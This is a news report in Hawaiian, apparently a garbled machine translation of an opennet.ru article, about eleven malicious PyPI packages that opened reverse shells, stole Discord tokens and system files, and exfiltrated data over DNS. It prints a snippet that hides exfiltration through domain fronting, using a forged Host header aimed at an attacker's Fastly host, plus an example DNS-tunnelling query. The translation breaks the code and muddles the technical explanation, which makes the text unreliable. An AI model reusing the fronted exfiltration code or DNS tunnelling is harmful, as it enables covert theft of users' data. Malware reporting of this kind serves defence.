Ma ka papa kuhikuhi PyPI (Python Package Index), ua ʻike ʻia nā pūʻolo 11 i loaʻa nā code malicious. Ma mua o ka ʻike ʻia ʻana o nā pilikia, ua hoʻoiho ʻia nā pūʻulu ma kahi o 38 tausani mau manawa. ʻIke ʻia nā pōʻai ʻino i ʻike ʻia no kā lākou hoʻohana ʻana i nā ala maʻalahi e hūnā i nā ala kamaʻilio me nā kikowaena o nā mea hoʻouka.
- importantpackage (6305 downloads), important-package (12897) - ua hoʻokumu i kahi pilina i kahi kikowaena waho ma lalo o ke ʻano o ka hoʻohui ʻana iā pypi.python.org e hāʻawi i ka shell i ka ʻōnaehana (reverse shell) a hoʻohana i ka polokalamu trevorc2 e hūnā i ka alahele kamaʻilio.
- pptest (10001), ipboards (946) - hoʻohana i ka DNS ma ke ʻano he ala kamaʻilio e hoʻouna i ka ʻike e pili ana i ka ʻōnaehana (ma ka ʻeke mua ka inoa host, papa kuhikuhi hana, IP kūloko a me waho, ma ka lua - ka inoa mea hoʻohana a me ka inoa host) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - ʻike i ka hōʻailona lawelawe Discord i loko o ka ʻōnaehana a hoʻouna ʻia i kahi hoʻokipa waho.
- trrfab (287) - hoʻouna i ka mea hōʻike, inoa host a me nā mea o /etc/passwd, /etc/hosts, /home i ka mea hoʻokipa waho.
- 10Cent10 (490) - ua hoʻokumu ʻia kahi pilina hui hope me kahi hoʻokipa waho.
- yandex-yt (4183) - hōʻike i kahi memo e pili ana i ka ʻōnaehana i hoʻopaʻa ʻia a hoʻihoʻi ʻia i kahi ʻaoʻao me ka ʻike hou e pili ana i nā hana hou i hoʻopuka ʻia ma o nda.ya.ru (api.ya.cc).
ʻO ka ʻike kikoʻī ʻo ke ʻano o ke komo ʻana i nā pūʻali o waho i hoʻohana ʻia i loko o nā pūʻolo koʻikoʻi a me nā pūʻolo koʻikoʻi, i hoʻohana i ka pūnaewele hāʻawi wikiwiki wikiwiki i hoʻohana ʻia ma ka papa kuhikuhi PyPI e hūnā i kā lākou hana. ʻO ka ʻoiaʻiʻo, ua hoʻouna ʻia nā noi i ka server pypi.python.org (me ka wehewehe ʻana i ka inoa python.org ma SNI i loko o ka noi HTTPS), akā ua hoʻokomo ʻia ka poʻomanaʻo HTTP "Host" i ka inoa o ka server i mālama ʻia e nā mea hoʻouka (sec. forward.io. global.prod.fastly.net). Ua hoʻouna aku ka pūnaewele hoʻolaha i kahi noi like i ka server hoʻouka, me ka hoʻohana ʻana i nā ʻāpana o ka pilina TLS i pypi.python.org i ka wā e hoʻouna ana i ka ʻikepili.
Hoʻohana ʻia ka ʻōnaehana PyPI e ka Fastly content delivery network, e hoʻohana ana i ka Varnish transparent proxy e hūnā i nā noi maʻamau, a hoʻohana pū i ka hoʻoponopono palapala TLS ma ka pae CDN, ma mua o nā kikowaena hope, e hoʻouna i nā noi HTTPS ma o kahi koho. Ma waho o ka host host, hoʻouna ʻia nā noi i ka mea koho, nāna e hoʻoholo i ka host makemake me ka hoʻohana ʻana i ke poʻomanaʻo "Host" HTTP, a ua hoʻopaʻa ʻia nā inoa domain host i ka CDN load balancer IP address i maʻamau no nā mea kūʻai aku Fastly.
Hoʻopaʻa inoa pū ke kikowaena o nā mea hoʻouka me CDN Fastly, e hāʻawi ana i nā hoʻolālā manuahi i nā poʻe a pau a hiki i ka hoʻopaʻa inoa inoa ʻole. He mea koʻikoʻi ia e hoʻouna i nā noi i ka mea i hoʻopilikia ʻia i ka wā e hana ai i kahi "reverse shell", hoʻohana pū ʻia kahi hoʻolālā, akā hoʻomaka ʻia mai ka ʻaoʻao o ka pūʻali o ka mea hoʻouka. Mai waho mai, ʻike ʻia ka launa pū ʻana me ke kikowaena o ka mea hoʻouka kaua me ka papa kuhikuhi PyPI, i hoʻopili ʻia me ka palapala PyPI TLS. ʻO kahi ʻano hana like, i kapa ʻia ʻo "domain fronting," i hoʻohana mua ʻia e hūnā i ka inoa o ka mea hoʻokipa i ka wā e kaʻawale ai i ka pale ʻana, me ka hoʻohana ʻana i ka hiki i hāʻawi ʻia i kekahi mau pūnaewele CDN e komo i ka HTTPS ma ka hōʻike ʻana i kahi host fictitious i ka SNI a hoʻouna maoli i ka inoa o ka. ua noi ʻia ka host ma ke poʻomanaʻo HTTP Host i loko o kahi hālāwai TLS.
No ka hūnā ʻana i ka hana ʻino, ua hoʻohana ʻia ka pūʻolo TrevorC2 e hana i ka launa pū me ke kikowaena e like me ka hoʻokele pūnaewele maʻamau, no ka laʻana, ua hoʻouna ʻia nā noi ʻino ma lalo o ke ʻano o ka hoʻoiho ʻana i ke kiʻi "https://pypi.python.org/images/ guid =” me ka hoʻopili ʻana i ka ʻike ma ka palena alakaʻi. url = "https://pypi.python.org" + "/images" + "?" + “guid =” + b64_payload r = noi. Noi (url, poʻo = {‘Host’: “psec.forward.io.global.prod.fastly.net”})
Ua hoʻohana nā pūʻolo pptest a me nā ipboards i kahi ala ʻē aʻe e hūnā i ka hana pūnaewele, e pili ana i ka hoʻopili ʻana i ka ʻike pono i nā nīnau i ke kikowaena DNS. Hoʻouna ka malware i ka ʻike ma o ka hoʻokō ʻana i nā noi DNS e like me "nu4timjagq4fimbuhe.example.com", kahi i hoʻopili ʻia ai ka ʻikepili i hoʻouna ʻia i ka server control me ka hoʻohana ʻana i ka waihona base64 ma ka inoa subdomain. Loaʻa ka mea hoʻouka i kēia mau memo ma ka hoʻomalu ʻana i ka server DNS no ka domain example.com.
Source: opennet.ru